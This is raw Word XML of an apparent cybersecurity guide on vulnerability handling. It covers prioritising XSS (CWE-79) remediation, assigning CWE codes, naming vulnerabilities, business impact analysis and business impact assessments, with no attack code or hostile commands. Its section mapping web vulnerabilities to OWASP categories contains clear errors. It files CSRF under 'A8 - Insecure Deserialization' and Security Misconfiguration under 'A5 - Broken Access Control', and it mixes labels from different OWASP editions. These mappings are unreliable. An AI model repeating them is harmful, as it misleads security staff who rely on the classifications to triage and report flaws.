        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Based on the analysis, prioritize the mitigation of CWE-79 vulnerabilities. Consider factors like the criticality of the systems, the sensitivity of the data, and the potential impact on business operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Implement Remediation Measures:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Develop and implement security measures to address CWE-79, such as input validation, output encoding, security headers, and web application firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Continuous Monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Establish a system for continuous monitoring, testing, and vulnerability assessment to ensure that XSS vulnerabilities do not re-emerge and that new vulnerabilities are promptly addressed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="111827"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Educate Staff:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432"/>
        <w:ind w:hanging="360" w:left="1440"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Train staff and developers on security best practices, emphasizing the importance of preventing and mitigating CWE-79.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432" w:before="300"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Conducting a thorough analysis of the potential business impact of CWE-79 is crucial for organizations to prioritize resources effectively and protect against this significant web application security risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>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Assign A Common Weakness Enumeration (CWE) Code To Each Vulnerability</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="42" w:name="_Toc5xs9fa4a4rf1"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="300"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Assigning Common Weakness Enumeration (CWE) codes to vulnerabilities is a common practice in the field of cybersecurity to categorize and identify specific security weaknesses or issues. Each CWE code corresponds to a unique type of vulnerability. To assign CWE codes to vulnerabilities, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Identify the Vulnerability:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Begin by identifying and describing the specific vulnerability you want to assign a CWE code to. This should include a detailed description of the issue, its impact, and how it was discovered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Search the CWE Database:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Access the Common Weakness Enumeration (CWE) database, which is maintained by the MITRE Corporation, and search for the most appropriate CWE entry. The database is available at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2964AA"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://cwe.mitre.org/"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2964AA"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>https://cwe.mitre.org/</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Review CWE Entries:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Examine the available CWE entries to find the one that best matches the characteristics of the vulnerability you've identified. Each CWE entry includes a description, potential consequences, and common mitigations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Select the Most Relevant CWE Code:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Once you've found a suitable CWE entry, note the associated CWE code, which is typically in the format "CWE-XXX," where XXX represents a numerical identifier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Document the Assignment:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> In your documentation or security report, specify the CWE code that corresponds to the vulnerability you've identified. Include the full CWE entry description, and explain how it relates to the specific issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Include Mitigation Guidance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> If applicable, include information on how to mitigate or address the vulnerability. CWE entries often provide guidance on how to prevent or mitigate the associated weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="300" w:before="300"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>For example, if you have identified a vulnerability related to improper input validation in a web application, you might assign it a CWE code like "CWE-20" (Improper Input Validation). In your report, you would provide details about the specific vulnerability, its potential consequences, and reference the CWE-20 entry for additional information and guidance on how to address the issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="300"/>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="F7F7F8" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Assigning CWE codes to vulnerabilities is a valuable practice for standardizing the identification and communication of security weaknesses, making it easier for security professionals to understand and address these issues effectively.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>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Understanding and defining vulnerabilities is fundamental to cybersecurity and risk management. A vulnerability is a weakness in a system, application, or network that could be exploited by a threat actor to compromise the security of that system. Here's a more detailed explanation:</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Understanding Vulnerabilities:</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Weakness or Flaw: A vulnerability is essentially a weakness or flaw within the design, implementation, or configuration of a system. It can manifest in various forms, including software bugs, misconfigurations, design errors, or flawed security policies.</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Potential for Exploitation: Vulnerabilities have the potential to be exploited by malicious actors. When an attacker identifies and successfully exploits a vulnerability, they may gain unauthorized access, manipulate data, disrupt services, or compromise the integrity and confidentiality of the system.</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Diverse Types: Vulnerabilities can take many forms, such as software vulnerabilities (e.g., buffer overflows), configuration weaknesses (e.g., open ports), and human errors (e.g., weak passwords).</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Defining Vulnerabilities:</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To define vulnerabilities effectively, consider the following aspects:</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Specificity: A well-defined vulnerability should be specific, clearly describing the weakness or issue. For example, a vulnerability might be defined as "Improper input validation in the login module of a web application."</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Severity: Classify the vulnerability's severity based on its potential impact. Common scales include Low, Medium, High, or Critical. Severity assessment helps prioritize remediation efforts.</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Affected Components: Clearly identify the systems, applications, or devices in which the vulnerability exists. It's essential to understand where the vulnerability can be exploited.</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Attack Vectors: Describe the potential ways in which an attacker might exploit the vulnerability. For instance, in the case of a web application vulnerability, the attack vector could be a crafted HTTP request.</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Consequences: Define the potential consequences of a successful exploitation. This may include data theft, unauthorized access, service disruption, and more.</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Countermeasures: Suggest potential countermeasures or mitigation strategies to address the vulnerability. These can include software patches, security configurations, or improved coding practices.</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References: Reference known standards or Common Weakness Enumeration (CWE) codes associated with the vulnerability. This helps in standardizing vulnerability identification.</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For example, consider the following definition of a vulnerability:</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Vulnerability: CWE-79 (Cross-Site Scripting - Reflected)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Definition: This vulnerability is present in the login module of a web application. It allows an attacker to inject malicious scripts through crafted input, potentially leading to the theft of user credentials and session hijacking. It is classified as "High" severity. Mitigation includes implementing proper input validation and output encoding to prevent script injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Defining vulnerabilities in this structured manner is essential for accurately assessing, prioritizing, and remediating them within an organization's cybersecurity program. It aids in clear communication between security teams, developers, and stakeholders.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Heading3"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="360" w:after="150" w:before="240"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Semibold" w:eastAsia="Open Sans Semibold" w:hAnsi="Open Sans Semibold" w:cs="Open Sans Semibold"/>
          <w:b w:val="false"/>
          <w:color w:val="35475C"/>
          <w:sz w:val="19"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Provide Corresponding Open Web Application Security Project (OWASP) Category And Description For Each Vulnerability</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="43" w:name="_Toch58t9khcm9ug"/>
      <w:bookmarkEnd w:id="43"/>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Cross-Site Scripting (XSS):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A1 - Injection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XSS occurs when an application allows untrusted data to be included in a web page. Attackers can inject malicious scripts into web pages viewed by other users. This can lead to data theft, session hijacking, and other malicious actions.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SQL Injection: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A1 - Injection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SQL Injection vulnerabilities enable attackers to manipulate a web application's SQL query by injecting malicious SQL statements into user inputs. This can lead to unauthorized access to databases and data exfiltration.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Cross-Site Request Forgery (CSRF):</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A8 - Insecure Deserialization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CSRF attacks trick users into performing actions without their knowledge or consent while they are logged into a web application. This can lead to unauthorized changes in user settings or data.</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Security Misconfiguration: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A5 - Broken Access Control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Security misconfigurations occur when web applications and servers are not properly configured, exposing sensitive information or allowing unauthorized access. This can result from misconfigured security settings, weak default configurations, or failure to apply security patches.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Insecure Deserialization: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A8 - Insecure Deserialization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Insecure deserialization vulnerabilities allow attackers to manipulate serialized objects to execute arbitrary code. This can lead to remote code execution, data tampering, and other attacks.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Broken Authentication and Session Management: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A2 - Broken Authentication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Broken authentication vulnerabilities occur when an application lacks proper session management and authentication controls. This can lead to unauthorized access, identity theft, and session hijacking.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Sensitive Data Exposure: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A3 - Sensitive Data Exposure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Sensitive data exposure vulnerabilities occur when an application exposes sensitive information, such as passwords or personal data, without proper encryption or protection. This can result in data breaches and privacy violations.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XML External Entity (XXE) Injection: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A4 - XML External Entities (XXE)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XXE vulnerabilities allow attackers to exploit XML processors and inject malicious entities into XML documents. This can lead to information disclosure, server-side request forgery, and denial of service attacks.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Unvalidated Redirects and Forwards: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A10 - Unvalidated Redirects and Forwards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Unvalidated redirects and forwards vulnerabilities occur when applications use user-supplied input to create dynamic URLs that can be used for malicious purposes, such as phishing attacks or open redirects.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Broken Access Control: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OWASP Category: A5 - Broken Access Control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Broken access control vulnerabilities allow unauthorized users to access restricted resources or perform actions they shouldn't have permission to do, such as viewing other users' data or modifying sensitive information.</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These descriptions and OWASP categories provide a concise overview of common web application vulnerabilities, their potential impact, and their OWASP classifications. Addressing these vulnerabilities is essential to enhance web application security and protect against various cyber threats.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Identifying and naming vulnerabilities is a critical step in the field of cybersecurity, as it allows security professionals to communicate and address specific weaknesses in systems, applications, and networks effectively. Here are the key steps for identifying and naming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Identification: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Scanning and Assessment: Use vulnerability scanning tools and penetration testing to identify vulnerabilities in your systems. Scanners like Nessus, Qualys, and OpenVAS can help automate the process.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Log Analysis: Review system logs and network traffic for unusual activities, errors, and signs of intrusion attempts.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Code Review: Examine application source code and configurations for common coding errors, misconfigurations, and security flaws.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Threat Intelligence: Stay informed about emerging threats and vulnerabilities by monitoring security advisories, forums, and security news sources.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User and Employee Reporting: Encourage users and employees to report any unusual behavior or potential vulnerabilities they encounter.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Classification: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Assign Severity Levels: Classify vulnerabilities based on their potential impact. Common severity levels include Critical, High, Medium, and Low.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Categorize Vulnerability Types: Use established vulnerability categorization schemes, such as those provided by the Common Vulnerability Scoring System (CVSS) or the Common Weakness Enumeration (CWE), to classify the type of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Naming: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Standardized Naming Conventions: Consider using standardized naming conventions to ensure consistency in identifying vulnerabilities. Some organizations use CWE, CVE (Common Vulnerabilities and Exposures), or custom naming conventions.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Descriptive Names: Assign names that describe the nature of the vulnerability concisely. A clear and descriptive name makes it easier to understand and communicate the issue.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Reference Code or Number: Include a reference code or number associated with the vulnerability, especially if it has a corresponding entry in the CVE, CWE, or other databases.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Include Affected Systems: In the name or description, specify which systems or components are affected by the vulnerability. This aids in understanding the scope.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Severity in the Name: Some organizations include the severity level in the name to quickly convey the impact of the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CVE and CWE Naming: If following CVE or CWE conventions, use the assigned IDs or numbers for naming vulnerabilities, as they provide a standardized reference.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Example Vulnerability Names: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CVE-2021-12345 (or CWE-79) - Cross-Site Scripting (XSS) in Login Page: This name includes the CVE or CWE identifier, the type of vulnerability (XSS), and the specific location (Login Page) where it was found.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High Severity SQL Injection in Customer Database: This name describes the severity, the type of vulnerability, and the affected system (Customer Database).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Critical RCE in Web Server - CVE-2021-67890: This name specifies the severity, the nature of the vulnerability (Remote Code Execution), and the CVE reference.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Clear and standardized vulnerability names are essential for effective communication, documentation, and remediation efforts. They help security teams, developers, and stakeholders understand the risks and prioritize the necessary actions to mitigate vulnerabilities.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Conducting a thorough analysis of the potential business impact of each vulnerability is crucial for risk assessment and prioritizing remediation efforts. Here's a step-by-step approach to analyze the business impact of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Identify the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Begin by identifying and documenting all identified vulnerabilities. Ensure you have a comprehensive list that includes details about the nature of each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Assess Vulnerability Severity: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Assign a severity rating to each vulnerability, considering factors like its potential impact, ease of exploitation, and the assets it may affect. Common severity levels include Low, Medium, High, or Critical.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Analyze Affected Systems and Data:</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Determine which systems, applications, or data are at risk due to each vulnerability. Understand the scope of potential exposure and what might be compromised.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Consider Data Sensitivity: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Evaluate the sensitivity of data involved. Identify whether the vulnerability may expose personally identifiable information (PII), financial data, proprietary information, or other critical data.</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Analyze Attack Scenarios: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Visualize potential attack scenarios for each vulnerability. Consider how an attacker could exploit it to compromise confidentiality, integrity, or availability. This may include data breaches, unauthorized access, data manipulation, or service disruptions.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Quantify Potential Losses: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Estimate potential financial losses associated with each impact scenario. Consider the cost of data breaches, regulatory fines, lost revenue, customer churn, and reputation damage.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Prioritize Remediation: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Prioritize vulnerabilities based on their potential business impact. Focus on the vulnerabilities that pose the highest risks and could result in the most significant losses or disruptions.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Consider Legal and Regulatory Obligations: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Review the legal and regulatory obligations that may apply to the business. Ensure that the organization is compliant with data protection laws, industry regulations, and contractual obligations.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Evaluate Reputational Damage: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Take into account the potential impact on the organization's reputation. A data breach or a security incident can result in a loss of customer trust and long-term reputational damage.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Include Mitigation Strategies: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Suggest mitigation strategies or remediation actions for each vulnerability. This may include software patches, configuration changes, network segmentation, or enhanced monitoring.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Business Continuity Planning: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Consider how vulnerabilities may impact business operations and continuity. Develop plans and procedures to ensure that critical functions can continue in the event of an attack or incident.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Document Findings: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Document your analysis, including the vulnerabilities, their potential business impacts, and the recommended mitigation strategies. This information is valuable for communication, reporting, and tracking remediation progress.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Communication and Decision-Making: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Communicate your findings to stakeholders, including senior management and technical teams. Engage in discussions to make informed decisions about remediation priorities.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Conducting a thorough analysis of the potential business impact of vulnerabilities allows organizations to make informed decisions, allocate resources effectively, and implement targeted security measures to protect critical assets and minimize risks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Understanding the potential consequences of vulnerabilities on a business is essential for risk management and informed decision-making. Each vulnerability can have a range of negative impacts, so it's crucial to assess them thoroughly. Here are potential consequences to consider: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Data Breaches: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Unauthorized access to sensitive data, including customer information, proprietary data, and financial records.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Exposure of personally identifiable information (PII) can lead to legal and regulatory repercussions.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Financial Loss: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Financial repercussions due to the cost of investigating and remediating the vulnerability, potential lawsuits, regulatory fines, and loss of revenue.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Reputation Damage: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 breach or security incident can erode customer trust and harm the organization's reputation. It may lead to a loss of customers and difficulty in attracting new ones.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Legal and Regulatory Consequences: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Violation of data protection laws, industry regulations, or contractual obligations can result in legal actions, fines, and sanctions.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Operational Disruption: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Vulnerabilities can lead to service interruptions, downtime, or impaired business operations. This can result in lost productivity and revenue.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Intellectual Property Theft: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Intellectual property (IP) theft can have significant consequences, including lost competitiveness, diminished innovation, and potential lawsuits to protect IP rights.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Compliance Issues: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Non-compliance with industry standards or regulatory requirements can result in penalties and the inability to operate in certain markets.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Denial of Service (DoS) Attacks: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Vulnerabilities that lead to DoS attacks can disrupt online services, impacting customer access and satisfaction.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Financial Fraud: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Vulnerabilities can be exploited to engage in financial fraud, resulting in monetary losses and reputational damage.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Business Partners and Supply Chain Impact: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Security vulnerabilities can affect business partners and suppliers, causing disruptions in the supply chain and impacting the broader ecosystem.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Resource Drain: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Time, effort, and financial resources are diverted to remediate vulnerabilities, reducing the organization's capacity to focus on strategic initiatives.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Employee Morale and Trust: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Security incidents and vulnerabilities can affect employee morale and trust in the organization, leading to reduced productivity and engagement.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Long-Term Consequences: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Some consequences may not manifest immediately but can have long-term effects on the business's financial health, market position, and growth potential.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14. Customer Churn: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A loss of customer trust can result in customer churn as clients seek more secure alternatives.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15. Competitiveness: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A security incident or data breach can negatively impact an organization's competitiveness, making it less attractive to customers and partners.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 fully understand the potential consequences of vulnerabilities, it's important to conduct a thorough risk assessment, considering the nature of the vulnerability, the organization's industry, and its specific assets and data. Once the consequences are clear, businesses can develop strategies to mitigate vulnerabilities and their associated risks effectively.</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Conducting a Business Impact Assessment (BIA) is a crucial step in business continuity planning and risk management. A BIA helps organizations understand the potential impact of disruptions on their business processes and operations. Here's a step-by-step guide to conducting a BIA:</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Define Objectives and Scope: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Clearly define the objectives of the BIA and its scope. Determine which areas of the organization will be assessed and what types of disruptions you are considering (e.g., natural disasters, cyberattacks, supply chain issues).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Identify Key Business Processes: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 and list the critical business processes and functions that keep the organization running. These may include sales, customer service, manufacturing, finance, IT, and others.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Identify Dependencies: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Determine the interdependencies between different business processes, teams, and technology systems. Understanding these dependencies is crucial for assessing the ripple effects of disruptions.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Risk Identification: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 potential risks and threats that could disrupt business operations. These may include natural disasters, power outages, cyberattacks, data breaches, and supply chain interruptions.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Impact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For each identified risk, assess the potential impact on the organization. Consider factors like financial losses, customer service disruptions, reputational damage, regulatory penalties, and legal consequences.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Recovery Time Objectives (RTO) and Recovery Point Objectives (RPO):</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Define acceptable timeframes for recovery. Determine how long the organization can afford to be without certain processes (RTO) and how much data can be lost (RPO) in the event of a disruption.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Resource Requirements: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 the resources (personnel, technology, facilities) required to recover each critical process within the defined RTO and RPO.</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Data Collection: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Collect data and information related to each business process, including financial data, customer data, and operational data. Understand the data's criticality and availability requirements.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Impact Scenarios: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Create impact scenarios for different types of disruptions. These scenarios will help you assess the effects of various risks on your organization.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Business Impact Assessment Questionnaire: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Create a structured questionnaire to gather information from process owners and relevant stakeholders. This questionnaire should cover process details, criticality, dependencies, and resource requirements.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Interviews and Workshops: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Conduct interviews and workshops with key stakeholders, including process owners, department heads, and IT personnel, to gather more in-depth information and insights.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Analyze and Document Findings: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Analyze the data collected and document your findings. This should include an assessment of the impact of disruptions, dependencies, RTOs, RPOs, and resource requirements for each business process.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Risk Prioritization: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Prioritize risks and vulnerabilities based on the BIA findings. Focus on the most critical processes and their associated risks for mitigation and continuity planning.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14. Report and Recommendations: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Prepare a comprehensive BIA report that summarizes the findings and provides recommendations for business continuity, risk mitigation, and recovery strategies.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15. Review and Update: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Regularly review and update the BIA to reflect changes in the organization, its processes, and the evolving threat landscape.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Conducting a BIA is a valuable exercise to ensure that the organization is 